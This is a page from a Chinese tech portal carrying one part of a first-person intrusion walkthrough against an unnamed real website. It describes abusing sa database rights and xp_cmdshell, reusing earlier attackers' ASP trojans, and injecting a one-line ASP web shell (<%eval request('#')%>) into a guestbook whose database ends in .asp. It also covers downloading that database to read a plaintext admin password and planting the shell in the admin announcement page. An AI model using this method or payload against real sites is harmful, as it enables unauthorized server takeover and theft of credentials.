通行证:用 户 密 码 注册 www.pconline.cn 汽车网 游戏网 时尚女性
  太平洋电脑网
首 页 |
论 坛 |
今日报价 | 产业资讯 | 数码世界 | 硬件资讯 | 软件资讯 | 下载中心 | 游 戏 |
产 品 库 | 渠道商情 | 招聘培训 | 二    手 | 评 测 室 | 导购大全 | 社 区 |
摄影
部落
北京 上海 广州 深圳 香港 广西
重庆 山东 江苏 辽宁 福建 成都
手机 数码相机 随身听 DIY配件 笔记本 台式机 摄像机 精品廊
手 机 数码相机 随身听 DIY配件 笔记本 台式机 摄像机 精品廊
 
 
   
首页 新闻 应用 评测 教你学电脑 信息安全 创意设计 开发特区 下载 专题 社区  
 
特色专区: | QQ大本营 | msn总动员 | 精品导用 | 组网专栏 | 设计素材 | Flash 剧场 | Photoshop专区 | 视频专栏 | CG专栏
 
 
您现在的位置: 软件资讯 > 软件应用 > 信息安全 > 黑客攻防战
多图详解:入侵国内某知名网站记录
作者:小鱼修炼 责任编辑:linjixiong


上传文件失败了

  提示“上传文件不成功!”怎么办?没事既然是sa的权限不能这样上传还有别的办法,试了试用xp_cmdshell直接加用户,TFTP上传,写脚本上传统统失败了!

  笔者想,既然这个站已经被人入侵过了,那么肯定会留下一些ASP木马要是能找到一个小的ASP木马不就可以上传大马了?继续找,再次来到网站目录下挨个看文件夹,突然看到一个MDB的目录,心情开始激动了,颤抖的手点了下去。图11


尝试一下这个目录可否上传

  里面有个guestbook.asp还有个a.asp,看看路径写着d:\xxxxhome\liuyan\mdb\,各位读者猜到这是什么了么?对了留言板!

  我们知道了默认数据库路径而且数据库以ASP结尾,如果在留言中插入那个一句话的ASP木马提交这样就会记录在数据库中,而数据库又是ASP结尾的这样就跟一个ASP木马一样了,访问数据库web地址页面出现了乱码,图12


页面出现了乱码

  这样就是没有做防下载处理,然后马上在留言板中留言在“主页”还有其他地方都输入了“ <%eval request("#")%> ”提交成功,用海洋c端连接发现还是不成功(可能是被过滤掉了吧!)!怎么办呢?于是用迅雷下载了这个ASP数据库改名为MDB后打开,找出管理员账号密码,图13


管理员密码居然是没有MD5加密

  登陆留言板,经过测试发现在管理员页面的公告中可以插入木马,图14


公告是脆弱的地方,可以插入木马

[上一页] [1] [2] [3] [4] [5] [6] [下一页]
  下一篇:黑客兵器:选择好你的漏洞扫描工具  
来PConline劲爆论坛抢大奖!马上点击进入网络安全讨论区
更多相关搜索: 黑客.. 服务器.. 入侵..
正在加载评论,请稍候…

  发给好友 我要报错 投稿给我们 加入收藏 返回顶部  

本栏今日更新
相关文章
·纷争又起:免费是Windows终极武器
·暂无补丁:苹果iTunes发现重大漏洞
·界面焕然一新,LumaQQ发布2005版本
·将秘密藏起来!刻录加密光盘攻略(下)
·无所遁形:快速查找对方IP经典技术汇
·QQ自动登录下防止隐私被查看的方法
·巨细无遗:教你实时监控每个打印动作
·播放更流畅:PPLive网络电视火热评测
·黑客兵器:选择好你的漏洞扫描工具
·你BT我更BT!记一次入侵BT服务器
·反黑必学:IP地址侦察和隐藏经验谈
·灰鸽子后门专杀工具
·远离黑客:十条永恒的安全法则
·用Linux系统防火墙抵挡黑客攻击
·黑客已发明mp3搜索传病毒的方法
·把我的爱机变成超级下载服务器
文章搜索
每日更新
 
焦点图文
软件新闻
纷争又起:免费是Windows终极武器
软件新闻
WinVista Build 5259今日发布
创意设计
用Photoshop合成超酷海报效果
开发特区
雅虎公司C#笔试题,看看你能解答多少?
精品导用
实时监控共享打印的机器
软件应用
把DVD大片拷到硬盘看
 
关于太平洋 | 网站地图 | 广告指南 | 联系我们 | 招聘精英 | 合作联系


广东省通信管理局
粤ICP证号:000010
技术支持与报障:support@pconline.com.cn
        020-87568837         
对本站有任何建议、意见或投诉,请点这里在线提交.
本网站简体、繁体两种版本,以简体版为准
PConline版权所有,未经授权禁止转载、摘编、复制或建立镜像.如有违反,追究法律责任__